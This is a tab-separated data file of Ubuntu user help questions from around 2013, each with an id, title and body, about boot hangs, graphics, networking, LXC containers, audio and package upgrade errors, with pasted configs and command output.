302118	black screen on installation of ubuntu 13.04	i keep on getting a black screen whenever i hit `` install ubuntu '' or `` try ubuntu before installing '' i have tried the `` nomodeset '' and `` acpi = off '' and `` nolapic '' and none have worked . i keep a cursor ... then both of my screens have the flashing cursor , then the cursor disappears and it hangs . im running a i7 extreme with rampage iv with 32gb of ram . already have windows 7 installed if that helps . also i have tried installing from dvd and usb and get same result .
302128	imac ubuntu 12.04 dual boot live cd hangs bluetooth	i have a brand new imac os 10.8.3 ( mountain lion ) . it 's the $ 1799 one as of this writing ( 5/30/13 ) . i want to be able to dual boot to ubuntu using refit . the installation of refit worked just fine and i have reduced the mac partition to accommodate an install of ubuntu . i have burned the cd ( first trying the 64 bit then the 32 bit ) . upon boot onto the cd , i get the language selection and when i select install ubuntu text fills the screen as it is detecting hardware . it gets to a line about the bluetooth usb host adapter and then it hangs forever . i am going to try a boot from flash drive to see if that will help , but otherwise i am at a loss . does anyone have any suggestions for me ?
302129	xubuntu 12.04 hang on boot of kernel 3.2.0-44-generic	i just updated and got the 3.2.0-44-generic kernel on my desktop dell t3400 . when i rebooted as required it hung in the xubuntu screen with the moving bar ... the bar stopped moving and nothing else happened ( i gave up after 5 minutes ) . i forced a power cycle and using grub booted 3.2.0-44-generic in recovery mode . the fsck selection reports `` superblock last mount time is in the future '' ... and `` fixed '' , the dpkg selection reports no broken packages , and the resume selection runs briefly before hanging . the last things reported are : swapon : /dev/disk/by-uuid/613f8c15-413f-4339-81b4-a3b2b092480f : swapon failed : device or resource busy swapon terminated with status 255 init ctl : event failed and dahdi then prints some stuff with the last thing being `` dahdi_transcode : '' then it hangs . on one try ( but only one of several ) after about 15 seconds i got another msg that started with : rcu_sched detected stalls on cpu/taksk : { 1 } ( edit every few tries i get rcu_sched detecting a stall , and most of the time this happens it starts endlessly dumping a bunch of debug info ... too fast to make sense of . but once it froze with rcu_sched actually reporting that dahdi_transcode was the actual task that was hung . i dont know how accurate this is since memory may be corrupted by something earlier in the boot process ) grub memory test was ok. and i can boot the prev kernel ( 3.2.0-43-generic ) ok. any thoughts or clues on how to fix this ? more info since it looks like a swap partition problem ( all from the 3.2.0-43-generic boot ) : my /etc/fstab is : # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc defaults 0 0 # / was on /dev/sda1 during installation uuid=c88a26e8-a137-4910-9601-6274caebc1f4 / ext4 errors=remount -ro , user_xattr 0 1 # swap was on /dev/sda5 during installation uuid=613f8c15-413f-4339-81b4-a3b2b092480f none swap sw 0 0 /dev/scd0 /media/cdrom0 udf , iso9660 user , noauto , exec , utf8 0 0 and `` fdisk -l '' shows : disk /dev/sda : 250.0 gb , 250000000000 bytes 255 heads , 63 sectors/track , 30394 cylinders , total 488281250 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xa42d04a3 device boot start end blocks id system /dev/sda1 * 63 476214794 238107366 83 linux /dev/sda2 476214795 488279609 6032407+ 5 extended /dev/sda5 476214858 488279609 6032376 82 linux swap / solaris where gparted shows sda5 to be within sda2
302130	windows wo n't boot after using chown on windows partition	i was following this : mount ntfs partition at startup , with non-root user as owner to be able to use permissions with my ntfs partitions without having to change owner to `` root '' . i did what the ( accepted ) first answer said with all my ntfs partitions . unfortunately , this also includes the partition on which i have windows installed . the problem now is that windows does n't load , it just shows a black screen with a cursor , after the `` starting windows '' screen . safe mode does the same . however , the windows partition mounts normally on ubuntu . how do i fix this ? additional info : i have ubuntu 12.04 lts installed along with windows 7 , ( both 64-bit ) . i do n't have an installation cd for windows , i only have the recovery dvds i created earlier . these will format the entire hard drive if used , and i really , really do n't want to do that . just before using chown and chmod on the windows partition , windows was working just fine . i removed the lines i added to /etc/fstab and the problem still exists . this is my boot-info in case you need it : http : //paste.ubuntu.com/5717589/
302132	integrated graphics : does ubuntu work better with intel hd graphics 4000 or with an amd apu ( amd radeon 7660d ) ?	i 'm planning to build a computer for myself , on which i 'll install ubuntu 13.04 64-bit . this computer will be used for light gaming and office work . in order to save some money , i 'm planning to use integrated graphics , but i do n't know whether to choose the intel hd graphics 4000 ( by using an intel i5-3570k processor ) or amd radeon 7660d graphics ( by using an amd a10-5800k processor ) . according to your technical knowledge / experience , which of these two choices is the best , in terms of stability and performance ? i want my system to be stable , but , at the same time , i would like to have some fancy compiz or kwin desktop effects , and play some games . i am more tempted to choose the amd apu , because it 's cheaper than intel , and i have read from the phoronix website , that this apu seems to work well , especially if using the proprietary catalyst driver . but i still wanted to know your opinion . so , intel or amd integrated graphics ?
302135	how to install google earth on ubuntu ?	i love the google earth program in windows , but what does it take to get it to run in linux and on ubuntu ?
302145	unity side bar icons size	is it possible to scale down unity 's sidebar icons ? im trying increment the vertical space in the way that it fits 2 more icons without scrolling .
302147	libre office is creating a new document every time i click on the launcher icon . how do i stop that and go to the documents i already open ?	i have the same problem that is already mentioned here window preview in libre but i do n't find the answers to that question useful : i just bought this computer ( one week ago ) that comes with ubuntu 12.04 and libre office 3.5.4.2 and i 'm not that happy with libre office , because i have been crushing several times , closing itself and i need to recover my documents , but the last issue was the same as hu23 mentioned . suddenly the window preview disappear and every time i click on the libre office icon on the side bar it opens a new window . what do i get the bird-eye view preview again and avoid this problem ?
302152	brightness control on toshiba p855-30d	this seems to be a recurring question , but none of the solutions i found here and there seem to work for me . so here are the facts : toshiba satellite p855-30d nvidia 640m bios 1.50 ubuntu 13.04 64 bits always at full backlight i 've tried the 4 variants given here : http : //ubuntuforums.org/showthread.php ? t=2139397 & p=12621502 & viewfull=1 # post12621502 with no luck . some of them make /sys/class/backlight/* empty . but even when it is populated , whatever i put in /sys/class/backlight/acpi_video0/brightness is ignored . the brightness keys are fn-f2 and fn-f3 on this model . fn-f2 opens the power statistics , fn-f3 crashes x . other function keys work fine . edit after upgrading the bios to latest 6.70 : grub_cmdline_linux= '' '' /sys/class/backlight/ is populated /sys/class/backlight/acpi_video0/max_brightness:100 changing /sys/class/backlight/acpi_video0/brightness has no effect grub_cmdline_linux= '' acpi_osi=linux acpi_backlight=vendor '' /sys/class/backlight/ is empty no param to change grub_cmdline_linux= '' acpi_osi= '' /sys/class/backlight/ is populated /sys/class/backlight/acpi_video0/max_brightness:7 changing /sys/class/backlight/acpi_video0/brightness has no effect grub_cmdline_linux= '' acpi_osi=\ '' ! windows 2012\ '' '' /sys/class/backlight/ is populated /sys/class/backlight/acpi_video0/max_brightness:7 changing /sys/class/backlight/acpi_video0/brightness has no effect opened a bug https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/1199062 since conventional solutions are not working .
302153	how to post reviews on apps.ubuntu.com ?	i can not seem to figure out where 's the option to log in or something on apps.ubuntu.com in order to be able to add a review to a program . how do i post reviews using this web-interface ?
302154	kde randomly locks screen	i have ubuntu 12.04 lts and i installed the kde desktop via the sudo apt-get install kde-plasma-desktop command ( i wanted less stuff than the sudo apt-get install kubuntu-desktop command would install ) . i did a bit of tweaking ( changing the order of the buttons/messing with decorations & themes , nothing terribly internal ) . for some reason , kde will randomly lock the screen . is this a problem with ubuntu , kde , a kde theme , or what ? this is n't a gargantuan problem as i prefer lxde and will be using it ( it runs fine the way i want it ) , so if you 're working on and about to find the cure for cancer , do n't drop that to help me .
302155	black screen after update from 12.04 to 12.10 ?	updated from 12.04 ( i think ) to 12.10 after update manager told me there was updates . i updated it , it finished and then restarted . when restarting it came up with the normal toshiba screen , then the ubuntu logo and the dots underneath loading.. then it said something about the hard drive ( i think ) and said to press s for something and m to manually sort the something or just wait . so i waited and it then loads a black screen , i wait and wait , and nothing ! i hold down power button , it turns off , i turn it on and it shows toshiba then ubuntu logo and then black screen . tried several times now , checked the bios and hdd is first in the list to load up and is recognized . i do not know what to do ? sorry if some of this does n't make sense , hopefully someone knows what to do ! i did try crtl+alt+f1 on the black screen to load the text thing but nothing happened ! thanks ! : s
302159	ubuntu 13.04 will not connect to share network drive	i have an ubuntu pc used as a file server running 12.10 64bit . i am able to connect to it using linux mint , windows7 and windows 8 , but unable to connect using ubuntu 13.04 . i have tried creating a link on the 13.04 desktop , but the 'create launcher ' feature has been removed from the right click menu , so tried via terminal to create the link : gnome-desktop-item-edit ~/desktop/ -- create-new however , clicking on the launcher just times out . tried to connect through dolphin , the same problem , connection times out . if i explore the local network going to location smb : /// the connection times out . if i try to go direct to a share folder smb : //192.168.0.2/videos again times out
302160	can not unmount sda partition in gparted	my /boot partition got full with updates , so i wanted to make it larger . i booted from a live disk , but my main partition is not unmountable ( and thus not resizeable , so i ca n't make it smaller to make the boot bigger . )
302161	grub shows brief blue screen on startup	i want to start up my computer and get to grub ( it 's worked before ) but now every time i turn my computer on , grub shows as a blank blue screen for about ten seconds , and then automatically boots into ubuntu .
302165	another lxc puzzle	so my server is running ... distributor id : ubuntu description : ubuntu 13.04 release : 13.04 codename : raring i stumbled onto lxc when i trying to find something to replace vmware on a small server i run . i really like it when it works but this one is totally baffling ... i have 4 containers , web , email , dns , db . the first three are bound to public addresses that i have . they all come up like normal . so take the email server for example . i start it up and see it on the network . i can get out to anywhere . i go to the host and ping its public address and get a response but when i try and telnet to the smtp port from the host i get `` connection refused '' so i go back to the container console and telnet to the public address ( just like i did from the host ) and it connects ... this was a clean install of ubuntu and like i said it ran perfect yesterday before a reboot ... i am lost ... it is happening on all three of my public addresses . not sure what u might want to see so i will just put a few things in ... the email containers netstat -tal root @ mail : /etc/network # netstat -tal active internet connections ( servers and established ) proto recv-q send-q local address foreign address state tcp 0 0 localhost : mysql * : * listen tcp 0 0 * : submission * : * listen tcp 0 0 * : pop3 * : * listen tcp 0 0 localhost : spamd * : * listen tcp 0 0 * : imap2 * : * listen tcp 0 0 * : ssh * : * listen tcp 0 0 * : smtp * : * listen tcp 0 0 * : imaps * : * listen tcp 0 0 * : pop3s * : * listen tcp 0 0 localhost:10024 * : * listen tcp 0 0 localhost:10025 * : * listen tcp 0 0 mail.centralvahos:49681 web.centralvahost : mysql time_wait tcp6 0 0 [ : : ] : submission [ : : ] : * listen tcp6 0 0 [ : : ] : pop3 [ : : ] : * listen tcp6 0 0 [ : : ] : imap2 [ : : ] : * listen tcp6 0 0 [ : : ] : tproxy [ : : ] : * listen tcp6 0 0 [ : : ] : ssh [ : : ] : * listen tcp6 0 0 [ : : ] : smtp [ : : ] : * listen tcp6 0 0 [ : : ] : imaps [ : : ] : * listen tcp6 0 0 [ : : ] : pop3s [ : : ] : * listen first my email container iptables ... root @ mail : ~ # iptables -l chain input ( policy accept ) target prot opt source destination fail2ban-dovecot-pop3imap tcp -- anywhere anywhere multiport dports pop3 , pop3s , imap2 , imaps fail2ban-ssh tcp -- anywhere anywhere multiport dports ssh chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination chain fail2ban-dovecot-pop3imap ( 1 references ) target prot opt source destination return all -- anywhere anywhere chain fail2ban-ssh ( 1 references ) target prot opt source destination return all -- anywhere anywhere and my interfaces ... auto em1 auto em1:0 auto em1:1 iface em1 inet static address 10.0.0.98 netmask 255.255.255.240 gateway 10.0.0.1 dns-nameservers 8.8.8.8 iface em1:0 inet static address 10.0.0.99 netmask 255.255.255.240 gateway 10.0.0.1 dns-nameservers 8.8.8.8 iface em1:1 inet static address 10.0.0.100 netmask 255.255.255.240 gateway 10.0.0.1 dns-nameservers 8.8.8.8 ( i have changed my numbers but u can see the other stuff ... ) and my email server container config ... lxc.network.type = veth lxc.network.hwaddr = 00:16:3e : c8 : e2 : b0 lxc.network.link = lxcbr0 lxc.network.flags = up lxc.rootfs = /var/lib/lxc/email/rootfs lxc.mount = /var/lib/lxc/email/fstab lxc.pivotdir = lxc_putold lxc.devttydir = lxc lxc.tty = 4 lxc.pts = 1024 lxc.utsname = email lxc.arch = amd64 lxc.cap.drop = sys_module mac_admin mac_override lxc.network.ipv4 = < my_address > /26 lxc.cgroup.devices.deny = a lxc.cgroup.devices.allow = c * : * m lxc.cgroup.devices.allow = b * : * m lxc.cgroup.devices.allow = c 1:3 rwm lxc.cgroup.devices.allow = c 1:5 rwm lxc.cgroup.devices.allow = c 5:1 rwm lxc.cgroup.devices.allow = c 5:0 rwm lxc.cgroup.devices.allow = c 1:9 rwm lxc.cgroup.devices.allow = c 1:8 rwm lxc.cgroup.devices.allow = c 136 : * rwm lxc.cgroup.devices.allow = c 5:2 rwm lxc.cgroup.devices.allow = c 254:0 rwm lxc.cgroup.devices.allow = c 10:229 rwm lxc.cgroup.devices.allow = c 10:200 rwm lxc.cgroup.devices.allow = c 1:7 rwm lxc.cgroup.devices.allow = c 10:228 rwm lxc.cgroup.devices.allow = c 10:232 rwm
302167	remote desktop from a ubuntu 13.04 to an ubuntu 13.04 machine so the user on the second machine can see my movments	i would like to remote desktop/vpn from an ubuntu 13.04 computer ( a ) to an ubuntu 13.04 computer ( b ) so the user ( s ) on the second machine can see my movements . i would like something a lot like team-viewer or join.me but these machines do not have internet but that are attached on a local network and i can vpn to them but that can not see what i am doing and i need them to be able to see my movements .
302168	installing ubuntu 12.0.4 along side windows 8 new partition table blank	trying to install ubuntu 12.04 along side windows 8 using an usb . in the installtion type menu where it shows the existing partitions , the menu is blank . if i click new partition table nothing happens . how to i make the partition table visible and create a new partition for ubuntu . the laptop is brand new and i have not created any partition for ubuntu . thanks for any help .
302172	executable file not executing	i can not run an executable file , and it seems that all permissions , owner , etc . are correct . i do n't understand the problem ; i hope that someone will find a solution . i 'm logged as tux . tux @ tux-laptop : ~/data/flightplan/fpp0.19linux $ whoami tux here is the directory where the executable resides . the file that i 'm trying to run is fp ( the program is installed and owned by tux , fp is flightplanpro for linux ) tux @ tux-laptop : ~/data/flightplan/fpp0.19linux $ ls -l total 113588 -rwxr-xr-x 1 tux tux 23807760 2013-05-30 19:26 fp when i try to run fp , this happens : tux @ tux-laptop : ~/data/flightplan/fpp0.19linux $ ./fp bash : ./fp : permission denied i checked 100 times and i made sure that the flag `` allow executing file as program '' is on . using sudo or root does n't help ; the permission denied error does n't show up , but nothing happens . tux @ tux-laptop : ~/data/flightplan/fpp0.19linux $ sudo ./fp i can run that program on my other linux machine without any problem . i 'm running ubuntu 11.10 ( for various reasons including disc space , i can not upgrade ) .
302174	how i can add bookmarks in files or pantheon files 0.1	i installed this software but i ca n't find the option to add bookmarks , or add to my favorite places .
302176	how to sync/upload lossless music to ios/ipod devices using ubuntu ?	it 's cool that it 's easy to sync ogg/mp3/aac music to the ipod/iphone/ipad using rhytmbox or banshee , but i 'm wondering that is it possible to upload lossless music somehow ? as far as i know , none of the software above support apple lossless format - they ca n't even play it . since apple lossless is released under the apache license , i think there must be some open-source solution for apple lossless conversion .
302180	is yahoo messenger , gtalk , hotmail messenger now available on ubuntu 13.04 ?	i am a messenger user and most of all like using all the messengers including yahoo , hotmail , gtalk . i want to know whether ubuntu now has all these messenger version that works perfectly on their os .
302182	after installing kde desktop only kde login	i installed kde via the sudo apt-get install kde-plasm-desktop command ( i wanted less packages than installing the kubuntu-desktop would give me ) and now i get the kde ( or is it kubuntu ? ) login screen : this is what i get , and i ca n't select the different des i have installed . i would like to go back to the default ubuntu login screen if that is possible . is there some sort of dpkg command i should run , because that would kinda make sense . thanks in advance ( that is , if you solve my problem . if you do n't well , then i suppose i could thank you for trying to help ... i dunno : d )
302188	certificate error when using citrix receiver	i am getting this error when attempting to load a desktop module up within citrix receiver : what i do n't understand is i can see this particular certificate is set to `` trust.. '' under any/all circumstances that i can find . this only happens in ubuntu , and i did not installed any certificates ( manually ) on either partition when trying to correct the issue . the browser also appears to be irrelevant ( chrome/firefox both generate the same error ) . forgive my ignorance on certificates , but this seems to be beyond my expertise . there are a few places i 've looked through various search engines , and i found other users who have had similar issues with certificates in the linux citrix receiver , but i 'm not sure what 's wrong with this certificate , as none of the other suggestions i 've tried have worked so far , and they 're too numerous to go into detail ... so i 'd like to take it from here and see what you all can offer up .
302189	new lenovo laptop wo n't connect to my wifi	i installed ubuntu 13.04 on my new laptop because i hate windows 8 . after installation my computer will detect wireless networks but it will not connect to the internet through my wireless connection . if i connect my laptop to my router with a cat5 cable , i can get online . am i missing the right drivers or something ? the computer i have is model : n580 - 59371992 . thanks . dave
302191	how do i install a program using a .md5 file ?	this is a very basic question that probably has a very easy answer . i am a frequent customer at humblebundle.com and some of the games come in a format called `` .md5 '' . i understand it is a format that is used to check an image for errors ( after some very superficial googling ) . is it possible to open the file with a specific program or is it necessary to use a terminal ? do n't get me wrong , i am a fan of the terminal , but i am a non-programming-languages-knowing kind of guy who just uses ubuntu for the fun of it . i would appreciate any answer . thank you in advance in case you are taking a look at it !
302194	ardour 3 and superior drummer	is it possible to have ardour3 working with superior drummer 2.0 ? i own an alessis dm10 , just wanted to start playing with midi and superior drummer . another enviroment is welcome too .
302197	how do i configure existing postfix server to use external spamassassin server ?	i have an existing postfix server using greylisting , and need to utilize an external , existing spamassassin server which is managed by someone else . how can i configure that ? i am thinking i would use spamc .
302202	can i run ubuntu on a very old laptop ?	hi ! i just started using ubuntu and i need some help . i have a 1gb compaq evo n610c laptop with 40gb of hard drive space and runs on windows xp . it is approximately 11 years old and i just want to mess around with ubuntu on it before i trash the laptop or take it apart . will i be able to run ubuntu on it or any other version of it ? i have already tried installing ubuntu but i got a ( initramfs ) unable to find a medium containing a live file system '' error ! any help is appreciated !
302204	cpu upgrade issue	is it possible to upgrade cpu ( ex : from amd athlon ii x2 to phenom ii x4 ) without any problems ? i means just replacing the old cpu with new cpu at same socket and booting ubuntu with any problems or changing something .
302206	remote initialization of pulseaudio devices	i am administrating remotely a ubuntu 12.04 which was originally installed as a desktop machine . i am away from home , so i want to use ssh in order to let my sound card to get access to a usb radio device that is connected to the computer . i normally configure the audio devices through the graphical interface . when i log in unity/gnome , the devices become automatically available on the pulse audio volume control and i can configure them as recording devices etc . through the ssh commandline unfortunately , i can start pulseaudio , but the devices are not available : $ pulseaudio -d $ lsusb bus 002 device 002 : id 06e1 : a155 fm radio receiver ( raa-158-ef ) bus 002 device 003 : id 1bcf:0007 sunplus innovation technology inc. optical mouse $ pactl list | grep receiver $ interestingly enough , neither the default sound card seems to be loaded . similarly if i run list-sources on pacmd . so if i try to run mplayer play a music file , i get this error ao : [ pulse ] init failed : connection refused failed to initialize audio driver 'pulse' [ ao_alsa ] alsa-lib : confmisc.c:768 : ( parse_card ) can not find card '0' [ ao_alsa ] alsa-lib : conf.c:4241 : ( _snd_config_evaluate ) function snd_func_card_driver returned error : no such file or directory aplay -l also reports no device.and so on . how can i properly initialize pulseaudio remotely then ?
302213	why wo n't com2 work ?	what is the command for turning com2 ( header connector ) on . motherboard is a intel d2500hn with one db9 ( com1 ) and a header connector for com2 . we were using the intel d425kt and both com ports worked fine .
302219	'404 not found ' errors when upgrading to 11.10	i tried upgrading from 11.04 to 11.10 and failed : $ sudo apt-get update & & sudo apt-get upgrade ign http : //old-releases.ubuntu.com oneiric-updates inrelease ign http : //old-releases.ubuntu.com oneiric inrelease hit http : //old-releases.ubuntu.com oneiric-updates release.gpg hit http : //old-releases.ubuntu.com oneiric release.gpg hit http : //old-releases.ubuntu.com oneiric-updates release hit http : //old-releases.ubuntu.com oneiric release hit http : //old-releases.ubuntu.com oneiric-updates/main armel packages hit http : //old-releases.ubuntu.com oneiric-updates/restricted armel packages hit http : //old-releases.ubuntu.com oneiric-updates/universe armel packages hit http : //old-releases.ubuntu.com oneiric-updates/multiverse armel packages hit http : //old-releases.ubuntu.com oneiric-updates/main translationindex hit http : //old-releases.ubuntu.com oneiric-updates/multiverse translationindex hit http : //old-releases.ubuntu.com oneiric-updates/restricted translationindex hit http : //old-releases.ubuntu.com oneiric-updates/universe translationindex hit http : //old-releases.ubuntu.com oneiric/main armel packages hit http : //old-releases.ubuntu.com oneiric/restricted armel packages hit http : //old-releases.ubuntu.com oneiric/universe armel packages hit http : //old-releases.ubuntu.com oneiric/multiverse armel packages hit http : //old-releases.ubuntu.com oneiric/main translationindex hit http : //old-releases.ubuntu.com oneiric/multiverse translationindex hit http : //old-releases.ubuntu.com oneiric/restricted translationindex hit http : //old-releases.ubuntu.com oneiric/universe translationindex hit http : //old-releases.ubuntu.com oneiric-updates/main translation-en hit http : //old-releases.ubuntu.com oneiric-updates/multiverse translation-en hit http : //old-releases.ubuntu.com oneiric-updates/restricted translation-en hit http : //old-releases.ubuntu.com oneiric-updates/universe translation-en hit http : //old-releases.ubuntu.com oneiric/main translation-en hit http : //old-releases.ubuntu.com oneiric/multiverse translation-en hit http : //old-releases.ubuntu.com oneiric/restricted translation-en hit http : //old-releases.ubuntu.com oneiric/universe translation-en reading package lists ... done reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : apt apt-utils aptitude bind9-host binutils ca-certificates console-setup cpp cpp-4.5 dnsutils g++ g++-4.5 gawk gcc gcc-4.5 gcc-4.5-base hostapd info iproute iputils-ping libbind9-60 libc-bin libc-dev-bin libc6 libc6-dev libcloog-ppl0 libcurl3-gnutls libcwidget3 libdns69 libept1 libgcc1 libgfortran3 libglib2.0-0 libgmpxx4ldbl libgomp1 libisc62 libisccfg62 liblocale-gettext-perl liblwres60 libmpc2 libmpfr4 libncurses5 libncurses5-dev libncursesw5 libpam-modules libpam-modules-bin libplymouth2 libpython2.7 libreadline5 libreadline6 libsasl2-2 libsasl2-modules libsigc++-2.0-0c2a libstdc++6 libstdc++6-4.5-dev libtext-charwidth-perl libtext-iconv-perl libxapian22 mount ncurses-bin openssh-client openssh-server openssl perl perl-base perl-modules plymouth python python-minimal python2.7 python2.7-minimal tcpdump vim vim-common vim-runtime w3m wget wpasupplicant the following packages will be upgraded : at autotools-dev base-files base-passwd bash bash-completion bsdmainutils bsdutils busybox-initramfs bzip2 chrony cpu-checker cron dash debconf debconf-i18n debianutils dhcp3-client dmsetup dnsmasq-base dosfstools dpkg eject file fuse-utils gdb git git-man gnupg gnupg-curl gpgv gpsd grep groff-base gzip hdparm hostname ifupdown im-switch initramfs-tools initramfs-tools-bin initscripts inputattach insserv install-info iputils-arping iputils-tracepath isc-dhcp-client isc-dhcp-common isc-dhcp-server kbd keyboard-configuration klibc-utils less libacl1 libattr1 libblas-dev libblas3gf libblitz0-dev libblitz0ldbl libblkid1 libbluetooth3 libbsd0 libbz2-1.0 libcap2 libck-connector0 libdb4.8 libdbus-1-3 libdevmapper1.02.1 libdrm-intel1 libdrm-nouveau1a libdrm-radeon1 libdrm2 libedit2 libelf1 libelfg0 libexpat1 libfuse2 libgc1c2 libgcrypt11 libgdbm3 libgeoip1 libgmp3c2 libgnutls26 libgpg-error0 libgpm2 libgps19 libgsl0-dev libgsl0ldbl libgssapi-krb5-2 libidn11 libisccc60 libiw30 libjpeg62 libk5crypto3 libkeyutils1 libklibc libkrb5-3 libkrb5support0 liblcms1 libldap-2.4-2 libmagic1 libnewt0.52 libnih-dbus1 libnih1 libnl1 libpam-ck-connector libpam-runtime libpam0g libpaper-utils libpaper1 libparted0debian1 libpcap0.8 libpci3 libpciaccess0 libpcsclite1 libpipeline1 libplist1 libpng12-0 libsctp1 libselinux1 libsepol1 libslang2 libsqlite3-0 libssl0.9.8 libtasn1-3 libts-0.0-0 libts-bin libudev0 libusb-0.1-4 libusb-1.0-0 libusbmuxd1 libuuid1 libwrap0 libxml2 libxml2-utils libxslt1.1 linux-firmware linux-firmware-nonfree linux-libc-dev lksctp-tools locales lockfile-progs login logrotate lsb-base m4 make man-db mawk mlocate mobile-broadband-provider-info module-init-tools mountall mtr-tiny multiarch-support ncurses-base netbase netcat-openbsd ntpdate passwd pciutils pkg-config pm-utils policykit-desktop-privileges pppoeconf procps psmisc readline-common rsyslog rtkit screen sed shared-mime-info strace sudo sysv-rc sysvinit-utils tcpd timelimit tsconf tzdata ucf udev upstart usbmuxd usbutils util-linux uuid-runtime whiptail whois wireless-crda wireless-tools xkb-data xsltproc zip 196 upgraded , 0 newly installed , 0 to remove and 78 not upgraded . need to get 63.7 mb of archives . after this operation , 11.4 mb of additional disk space will be used . do you want to continue [ y/n ] ? err http : //old-releases.ubuntu.com/ubuntu/ oneiric/main debianutils armel 4.0.2 404 not found err http : //old-releases.ubuntu.com/ubuntu/ oneiric-updates/main libudev0 armel 173-0ubuntu4.3 404 not found err http : //old-releases.ubuntu.com/ubuntu/ oneiric/main module-init-tools armel 3.16-1ubuntu1 404 not found err http : //old-releases.ubuntu.com/ubuntu/ oneiric-updates/main initramfs-tools all 0.99ubuntu8 404 not found err http : //old-releases.ubuntu.com/ubuntu/ oneiric-updates/main initramfs-tools-bin armel 0.99ubuntu8 404 not found err http : //old-releases.ubuntu.com/ubuntu/ oneiric/main debconf all 1.5.40ubuntu1 404 not found err http : //old-releases.ubuntu.com/ubuntu/ oneiric-updates/main libpam0g armel 1.1.3-2ubuntu2.1 404 not found err http : //old-releases.ubuntu.com/ubuntu/ oneiric/main libselinux1 armel 2.0.98-1.1 404 not found err http : //old-releases.ubuntu.com/ubuntu/ oneiric-updates/main libpam-runtime all 1.1.3-2ubuntu2.1 404 not found ... that makes me wonder if this a temporary situation , or if i must do something about my repository sources : $ cat /etc/apt/sources.list deb http : //old-releases.ubuntu.com/ubuntu oneiric-updates main restricted universe multiverse deb http : //old-releases.ubuntu.com/ubuntu oneiric main restricted universe multiverse
302222	is it possible to accidentally format a truecrypt-encrypted drive ?	i have a truecrypt-encrypted drive that i want to install as a 2nd drive . however , i 'm afraid that a family member who uses my computer might accidentally format my truecrypt-encrypted drive ( and erasing everything in it ) . so my question is , is it possible to accidentally format such a drive in nautilus ? or is launching and using disk utility the only way to format such a drive ? in windows , a truecrypt-encrypted drive shows up as an un-formatted drive in windows explorer , so it 's just one-click away from an accidental format . to keep it safe , i had to remove the drive letter in disk management . any help is appreciated . ubuntu newbie here . : )
302223	screen freeze - asus desktop and unbuntu , 12.04	i bought an asus desktop with an i5 . i switched from windows 8 to linux 12.04 . however , any time i allow the computer to `` sleep '' , the screen freezes , and i have to shut the computer off in order to get the screen to re-appear . there are other small issues that relate to the screen , too . for instance , on occasion , the mouse cursor will disappear . i will have to go to the top right and click on `` suspend '' , which puts the computer off the internet , then press a key to come back -- and i will be able to see the mouse cursor again . if anyone else has worked through this issue and can provide information it is appreciated . i am not a computer guy and i am hoping there is a semi-simple fix . thanks a lot . d
302228	attempting to set up a minecraft server	does anyone have any experience setting up a minecraft server with ubuntu using putty ? to clarify , this server will be running off of a host , not my computer . to accomplish this , i need to install multicraft , the control panel which i can control my minecraft servers from . i have been following multiple sets of instructions , but i every time , i follow the instructions perfectly , but i always encounter some sort of problem that prevents me from completing the process . http : //webcache.googleusercontent.com/search ? q=cache : http : //www.creativetux.com/2013/03/multicraft-installation-on-ubuntu-1210.html http : //www.multicraft.org/site/page ? view=hylianux does anyone have more specific instructions that can make this work ? even better , if anyone would n't mind walking me though this step by step , add me on skype : themattvid .
302229	ubuntu crashes for no apparent reason	i have ubuntu 12.04 on my desktop . it has been working flawlessly for the past few months . while using my computer ubuntu crashed , like it switched from gnome classic to console mode and a whole sequence of processes were killed , and it just stopped right there . it was like all the processes were killed , and the actual machine just stayed on . i do n't know what is up with that . next time i booted , and same thing happened again . i then booted and switched to console mode and the same thing happened again . i am completely out of my water here . i am not able to think of a single reason this keeps happening , other than someone using my wifi and ssh'ing in my machine and shutting it down , which is not the case . i have not made any changes recently which i can think can be the reason for this . i was just using the browser and the file browser . other than that , nothing has been edited or changed . no application was updated or removed or changed . edit : ok i tried single user mode , it crashes there as well . it shows an error of out of memory while killing processes . i also created a new user to try that , and the result was the same . i have tried logging in from tty1 , to same avail . no matter what i do , it shows out of memory killing processes . i have 4 gigs of ram , so i do n't think there should be any problems with low memory . here is an image link to the error :
302235	trying to recover files from a windows 7 machine using ubuntu	ok so i cant boot my windows 7 machine and recovery tool wont load either . i need to recover the files from my harddrive and i heard about this through an internet search . every website and youtube video i come across shows you can choose the language and then select `` run without making any changes to my computer '' . so i download the file to a cd and pop it in and i try to run it . well its not giving me any of those options or questions , it looks like its just installing the ubuntu os . i dont want to install the ubuntu os . i just need to recover my files . how come the options arent coming up like they show on the videos on youtube and in the directions around the web ? reference here ... http : //www.howtogeek.com/howto/windows-vista/use-ubuntu-live-cd-to-backup-files-from-your-dead-windows-computer/ http : //www.youtube.com/watch ? v=p6tbuab-epw http : //www.youtube.com/watch ? v=wpale245eoq basically i just want to make sure i run this only to recover my files , not install the software . `` try ubuntu without making any changes to my computer '' is this still possible ? is there some installation that has to take place before it will give the prompts i should be seeing ? i just need some help . thanks .
302243	trying to install my updates from update manager , gives me the message below and crashes	previous installation has n't been completed the installation could have failed because of an error in the corresponding software package or it was cancelled in an unfriendly way . you have to repair this before you can install or remove any further software . details e : method has died unexpectedly ! , e : sub-process returned an error code ( 100 ) , e : method /usr/lib/apt/methods/ did not start correctly how do i fix this ? thanks
